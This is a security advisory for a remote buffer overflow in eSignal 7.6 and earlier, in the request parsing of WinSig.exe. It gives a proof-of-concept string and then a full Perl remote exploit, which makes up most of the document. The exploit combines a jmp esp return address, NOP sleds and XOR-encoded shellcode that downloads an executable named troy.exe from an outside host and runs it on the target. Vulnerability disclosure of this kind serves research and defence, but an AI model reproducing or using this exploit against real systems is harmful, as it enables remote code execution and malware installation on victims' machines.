|
Brought to you by:
Suppliers of:
|
|
|
| |
"eSignal is the nation's leading provider of real-time financial and market information. eSignal is a popular platform for institutional and professional traders. eSignal is a market data solution bundled for best value for small to mid-size institutional investors that also includes additional optional services."
A remote buffer overflow condition exists in eSignal due to invalid bounds checking when receiving requests. |
| |
Credit:
The information has been provided by Vizzy.
|
| |
Vulnerable Systems:
* eSignal version 7.6 and prior
The main application WinSig.exe is listening for incoming data on TCP port 80. However, when parsing the incoming requests it suffers from a classic buffer overflow condition when the parameter string exceeds about 1040 characters. A proof-of-concept:
<STREAMQUOTE>
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA....... x 1040
</STREAMQUOTE>
The overflow occurs in Specs.dll and the instruction pointer (EIP) is totally under our control. There can be no NULL character in the crafted payload and all lower-case characters are converted to upper case. Since the MFC71.dll file contains the "jmp esp" instruction it is trivial to overflow the application and direct the code to the payload.
Exploit:
An exploit code in Perl for the buffer overflow is presented below:
#!/usr/bin/perl
#
# eSignal v7.6 remote exploit (c) VizibleSoft =*= http://viziblesoft.com/insect
#
# 25-mAR-2004
#
use IO::Socket;
sub usage
{
die("\nUsage: perl $0 host port\n");
}
print "\r\neSignal v7.6 remote exploit, (c) VizibleSoft.com\r\n";
my $ip = $ARGV[0] || usage();
my $port = $ARGV[1] || usage();
my $data = "";
my $ret = "\xf3\x7b\x20\x7c"; # MFC71.dll "jmp esp"
my $nop = "\x90";
#
# Used api..
#
$api = "\x00wininet.dll\x00InternetOpenA\x00".
"InternetOpenUrlA\x00InternetReadFile\x00kernel32.dll\x00".
"_lcreat\x00_lwrite\x00_lclose\x00";
#
# Url of file to execute
#
$url = "http://viziblesoft.com/insect/sploits/troy.exe";
#
#
# Filename for our file on remote system
$fname = "setup.exe";
#
#
# Shellcode: downloads and executes file at URL
#
$shellc = "\x90".
"\x8B\xEC\x03\xEA\xB8\xEA\xFE\xFF\xFF\xF7\xD0\x03\xE8\x83\xC5\x0B\x8B\xFD\x4F\xF7".
"\x17\x83\xC7\x04\x83\x3F\xFF\x7C\xF6\xF7\x17\xB8\x5C\x12\x14\x7C\x8B\x18\x55\xFF".
"\xD3\x8B\xF8\x33\xC9\xB1\x03\x8D\x55\x0C\xB8\x58\x12\x14\x7C\x8B\x18\x51\x52\x52".
"\x57\xFF\xD3\x5A\x59\x89\x02\x83\xC2\x03\x42\x8A\x02\x3A\xC5\x7F\xF9\x42\xFE\xC9".
"\x3A\xCD\x7F\xDE\xB8\x5C\x12\x14\x7C\x8B\x18\x8D\x55\x3C\x52\xFF\xD3\x8B\xF8\xB8".
"\x58\x12\x14\x7C\x8B\x18\x53\x8D\x55\x49\x52\x52\x57\xFF\xD3\x5A\x89\x02\x8B\x1C".
"\x24\x8D\x55\x51\x52\x52\x57\xFF\xD3\x5A\x89\x02\x5B\x8D\x55\x59\x52\x52\x57\xFF".
"\xD3\x5A\x89\x02\x33\xD2\x52\x52\x52\x52\x55\xFF\x55\x0C\x33\xD2\x52\xB6\x80\xC1".
"\xE2\x10\x52\x33\xD2\x52\x52\x8D\x4D\x60\x41\x51\x50\xFF\x55\x1A\x89\x45\x1A\x33".
"\xD2\x52\x8D\x55\xF6\x52\xFF\x55\x49\x89\x45\x49\x33\xD2\xB6\x02\x2B\xE2\x83\xEC".
"\x04\x33\xD2\xB6\x02\x54\x8B\xC4\x83\xC0\x08\x52\x50\x8B\x45\x1A\x50\xFF\x55\x2B".
"\x8B\x04\x24\x8D\x54\x24\x04\x50\x52\x8B\x45\x49\x50\xFF\x55\x51\x83\x3C\x24\x01".
"\x7D\xD7\x8B\x45\x49\x50\xFF\x55\x59\x8D\x55\xF6\x52\xB8\x3F\x0E\x81\xF8\x35\x80".
"\x80\x80\x80\xFF\xD0\xB8\xD3\xFC\x80\xF8\x35\x80\x80\x80\x80\xFF\xE0$fname";
$movsb = "\x90\x33\xc9\xb5\x02\xb1\xcc\x8b\xf4\x2b\xf1\x8b\xfc\x33\xd2\xb2\x15\x03\xfa\xf3\xa4";
#
# xor data block
#
$url = $api . $url;
for(my $i=0; $i<length($url); $i++) {
$data = $data . (substr($url, $i, 1) ^ "\xff");
};
$data .= "\xff\xff\xfe\xfe\xff\xff\xff\xff";
#
# construct overflow string...
#
$shellc .= $data;
$shellc .= ("\xcc" x (712 - length($shellc)));
$shellcode = $nop x (8 * 16) .
$shellc .
$ret .
$movsb .
$nop x (191-16);
# print "shellcode len: " . length($shellcode) . "\r\n";
$data = '<STREAMQUOTE>' . $shellcode . '</STREAMQUOTE>';
# print "sending data of len: " . length($data) . "\n";
print sendraw($data);
print "[+] Overflow sent / file executed!\n";
exit;
sub sendraw {
my ($pstr)=@_;
my $target;
$target= inet_aton($ip) || die("[-] inet_aton problems");
socket(S,2,1,getprotobyname('tcp')||0) || die("[-] Socket problems\n");
if(connect(S,pack "SnA4x8",2,$port,$target)){
select(S); $|=1;
print $pstr; my @in=<S>;
select(STDOUT); close(S);
return @in;
} else { die("[-] Can't connect...\n"); }}
The exploit can also be found at http://viziblesoft.com/insect/sploits/vz-eSignal76.pl.
|
|
|
|
|
